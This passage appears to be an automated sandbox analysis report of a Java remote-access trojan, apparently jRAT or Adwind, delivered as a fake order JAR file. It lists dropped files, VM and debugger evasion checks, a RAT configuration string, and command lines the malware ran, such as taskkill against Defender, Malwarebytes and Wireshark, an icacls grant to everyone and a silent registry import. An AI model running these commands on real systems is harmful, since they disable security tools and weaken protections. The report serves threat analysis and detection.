Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcp140.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll Jump to dropped file
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe API coverage: 1.2 %
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BDescription=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: javaw.exe, 00000006.00000002.2851634120.000000000A398000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A3E5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004F2D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: DeviceName=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Adevicename=microsoft hyper-v virtualization infrastructure driver
Source: xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JVM version %s (%s, %s)VirtualMachineImpl.cRedefineClassesGetTopThreadGroupsJNI_FALSENewStringUTF;classTrack.csignaturessignature bagDeleteWeakGlobalRefclassTrack tableloaded classesAttempting to insert duplicate classKlassNodesignatureNewWeakGlobalRefloaded classes arraycommonRef.cSetTagFreeing %d (%x)
Source: java.exe, 00000002.00000002.1635572608.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2843520810.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843639949.0000000001614000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: java.exe, 00000007.00000003.1670111593.00000000154F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: java.exe, 00000002.00000002.1635572608.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2843520810.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843639949.0000000001614000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cjava/lang/VirtualMachineError
Source: wscript.exe, 00000005.00000003.1666098782.0000000006AF6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: java.exe, 00000007.00000002.2845228924.000000000542F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ADeviceName=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: java.exe, 00000007.00000002.2845228924.0000000005189000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_
Source: java.exe, 00000002.00000003.1625026729.0000000015352000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1664952445.0000000014EC6000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1670111593.00000000154F2000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1755381709.000000000288D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: java/lang/VirtualMachineError.classPK
Source: java.exe, 00000007.00000002.2843639949.00000000015EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWN
Source: java.exe, 00000007.00000002.2845228924.0000000005189000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
Source: javaw.exe, 00000006.00000002.2845247996.0000000004B3D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: /DeviceName=Microsoft Hyper-V Generation Counter
Source: java.exe, 00000007.00000002.2845228924.0000000005189000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_
Source: java.exe, 00000002.00000002.1635572608.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2843520810.0000000000D48000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: javaw.exe, 00000006.00000002.2851634120.000000000A398000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A3E5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004F2D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Description=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: javaw.exe, 00000006.00000002.2845247996.0000000004B3D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: /devicename=microsoft hyper-v generation counter
Source: java.exe, 00000007.00000002.2845228924.000000000524C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
Source: java.exe, 00000007.00000003.1670111593.00000000154F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: java.exe, 00000007.00000003.1670111593.00000000154F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VirtualMachineImpl.c
Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Bdescription=microsoft hyper-v virtualization infrastructure driver
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information queried: ProcessInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A92C97 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_73A92C97
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A945FB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 6_2_73A945FB
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A92C97 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_73A92C97
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A91244 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_73A91244
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Memory protected: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Excessive usage of taskkill to terminate processes
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\zbrspjjraf.js Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\krmyqqmohp.txt" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
